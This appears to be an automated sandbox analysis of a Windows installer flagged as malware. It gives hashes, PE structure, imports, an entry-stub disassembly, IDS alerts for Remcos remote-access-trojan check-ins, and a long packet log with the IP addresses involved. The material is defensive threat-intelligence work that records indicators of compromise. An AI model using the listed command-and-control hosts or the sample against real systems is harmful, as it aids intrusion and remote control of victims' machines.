                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:true
                                Preview:[ZoneTransfer]....ZoneId=0
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):7.022322453988849
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:zR4aIjCuRs.exe
                                File size:776'478 bytes
                                MD5:02f086fb54d58bf17b51564b34166f5e
                                SHA1:6ad69c9bdafb1a4ca5c0d15836b3e0abdd0a1e62
                                SHA256:2ac935868a1f972e5a036986147051402e1b656a5ac9ac4b8ca15252f14e15fd
                                SHA512:d34ceb0a5835c88f3d10a3e2e31f0e91a71809c5c514a1d2573c5a126e51f5bd4ef1f4f41b166f468d2222b6d0abf04871109a3450f039eb4a577b9067c02afa
                                SSDEEP:12288:HQIoWuLS5jMYG1kqqGDFL34Od2l2QrClyxzwsNZU18Do9I4jMSPM:H7uLS5jtGTDFoOd2YQIyZfZ74jvM
                                TLSH:F9F412003AC0CC23DDA10A749DA7C7EA6B786E54AC05DB477704BF4E78773D36A1AA91
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...<.oZ.................h.........
                                Icon Hash:5cf87c6c5d460252
                                Entrypoint:0x40338f
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x5A6FED3C [Tue Jan 30 03:57:48 2018 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:b34f154ec913d2d2c435cbd644e91687
                                Instruction
                                sub esp, 000002D4h
                                push ebx
                                push esi
                                push edi
                                push 00000020h
                                pop edi
                                xor ebx, ebx
                                push 00008001h
                                mov dword ptr [esp+14h], ebx
                                mov dword ptr [esp+10h], 0040A2E0h
                                mov dword ptr [esp+1Ch], ebx
                                call dword ptr [004080A8h]
                                call dword ptr [004080A4h]
                                and eax, BFFFFFFFh
                                cmp ax, 00000006h
                                mov dword ptr [00434EECh], eax
                                je 00007F86EC51FC63h
                                push ebx
                                call 00007F86EC522F15h
                                cmp eax, ebx
                                je 00007F86EC51FC59h
                                push 00000C00h
                                call eax
                                mov esi, 004082B0h
                                push esi
                                call 00007F86EC522E8Fh
                                push esi
                                call dword ptr [00408150h]
                                lea esi, dword ptr [esi+eax+01h]
                                cmp byte ptr [esi], 00000000h
                                jne 00007F86EC51FC3Ch
                                push 0000000Ah
                                call 00007F86EC522EE8h
                                push 00000008h
                                call 00007F86EC522EE1h
                                push 00000006h
                                mov dword ptr [00434EE4h], eax
                                call 00007F86EC522ED5h
                                cmp eax, ebx
                                je 00007F86EC51FC61h
                                push 0000001Eh
                                call eax
                                test eax, eax
                                je 00007F86EC51FC59h
                                or byte ptr [00434EEFh], 00000040h
                                push ebp
                                call dword ptr [00408044h]
                                push ebx
                                call dword ptr [004082A0h]
                                mov dword ptr [00434FB8h], eax
                                push ebx
                                lea eax, dword ptr [esp+34h]
                                push 000002B4h
                                push eax
                                push ebx
                                push 0042B208h
                                call dword ptr [00408188h]
                                push 0040A2C8h
                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x39180.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x66270x68008c030dfed318c62753a7b0d60218279bFalse0.6642503004807693data6.452235553722483IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x80000x149a0x1600966a3835fd2d9407261ae78460c26dccFalse0.43803267045454547data5.007075185851696IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xa0000x2aff80x600939516377e7577b622eb1ffdc4b5db4aFalse0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata0x350000x1d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x520000x391800x392002b4e1d509c996fc0835cd264198de9c9False0.33165942970459517data3.439269253351708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x524a80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.1941470483851887
                                RT_ICON0x62cd00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.21788942610889217
                                RT_ICON0x6c1780x7da9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9887780161024589
                                RT_ICON0x73f280x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.22041353383458648
                                RT_ICON0x7a7100x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.22504621072088724
                                RT_ICON0x7fb980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.22815304676428907
                                RT_ICON0x83dc00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.24553941908713692
                                RT_ICON0x863680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.26852720450281425
                                RT_ICON0x874100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.4341684434968017
                                RT_ICON0x882b80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.29713114754098363
                                RT_ICON0x88c400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.4453971119133574
                                RT_ICON0x894e80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.3824884792626728
                                RT_ICON0x89bb00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.24566473988439305
                                RT_ICON0x8a1180x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3421985815602837
                                RT_DIALOG0x8a5800x144dataEnglishUnited States0.5216049382716049
                                RT_DIALOG0x8a6c80x100dataEnglishUnited States0.5234375
                                RT_DIALOG0x8a7c80x11cdataEnglishUnited States0.6056338028169014
                                RT_DIALOG0x8a8e80xc4dataEnglishUnited States0.5918367346938775
                                RT_DIALOG0x8a9b00x60dataEnglishUnited States0.7291666666666666
                                RT_GROUP_ICON0x8aa100xcadataEnglishUnited States0.6633663366336634
                                RT_VERSION0x8aae00x274dataEnglishUnited States0.5222929936305732
                                RT_MANIFEST0x8ad580x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076
                                DLLImport
                                KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-06T11:47:04.196262+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.204976885.120.16.93443TCP
                                2024-10-06T11:47:10.534594+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.11.2049769192.169.69.263980TCP
                                2024-10-06T11:47:33.265040+02002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.11.2049773192.169.69.263980TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 6, 2024 11:47:03.316562891 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:03.316688061 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:03.317028999 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:03.342674017 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:03.342745066 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:03.758506060 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:03.758790016 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:03.788209915 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:03.788296938 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:03.789587975 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:03.789776087 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:03.791614056 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:03.832364082 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.196424961 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.196645021 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.196736097 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.196894884 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.398116112 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.398140907 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.398263931 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.398349047 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.398403883 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.398515940 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.398680925 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.399157047 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.399210930 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.399408102 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.399409056 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.399480104 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.399518967 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.399709940 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.600701094 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.600740910 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.600898027 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.600924969 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.600944042 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.601089001 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.601758003 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.601793051 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.601912022 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.601989985 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.602016926 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.602133036 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.602236032 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.603197098 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.603229046 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.603394032 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.603415966 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.603457928 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.603646040 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.801456928 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.801498890 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.801604033 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.801681042 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.801696062 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.801839113 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.802149057 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.802185059 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.802280903 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.802280903 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.802328110 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.802377939 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.802390099 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.802500963 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.802566051 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.802666903 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.802699089 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.802812099 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.802851915 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.802865982 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.802917004 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.803116083 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.803148985 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.803282022 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.803299904 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.803459883 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.803482056 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.803540945 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.803747892 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.803909063 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.803946018 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.804061890 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.804307938 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.804322958 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.804554939 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.843939066 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.843978882 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.844090939 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.844285965 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:04.844301939 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:04.844610929 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.002325058 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.002365112 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.002563000 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.002583981 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.002626896 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.002743959 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.002844095 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.002882957 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.002952099 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.003000021 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.003101110 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.003113031 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.003243923 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.003735065 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.003762007 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.003962040 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.004059076 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.004188061 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.004199982 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.004504919 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.004535913 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.004642010 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.004658937 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.004877090 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.004959106 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.004986048 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.005085945 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.005161047 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.005176067 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.005278111 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.005403996 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.005434990 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.005474091 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.005486012 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.005569935 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.005569935 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.005667925 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.005733967 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.005759954 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.005789042 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.005942106 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006031990 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006045103 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.006153107 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.006186008 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.006227970 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006242037 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.006304979 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006396055 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006505013 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.006530046 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.006551981 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006565094 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.006629944 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006629944 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006726980 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006726980 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006776094 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.006882906 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.006915092 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.007020950 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.007241011 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.007253885 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.007388115 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.007412910 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.007422924 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.007436991 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.007591963 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.007657051 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.047252893 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.047283888 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.047388077 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.047489882 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.047502041 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.047586918 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.047736883 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.087357998 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.087428093 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.087564945 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.087728024 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.087771893 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.087910891 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.205553055 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.205673933 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.205785036 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.205785036 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.205950022 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.205950022 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.205950022 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.206037998 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.206250906 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.206605911 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.206692934 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.206867933 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.206939936 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.206964970 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.207212925 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.207740068 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.207827091 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.207938910 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.207940102 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.207940102 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.208015919 CEST49768443192.168.11.2085.120.16.93
                                Oct 6, 2024 11:47:05.208054066 CEST4434976885.120.16.93192.168.11.20
                                Oct 6, 2024 11:47:05.208172083 CEST49768443192.168.11.2085.120.16.93
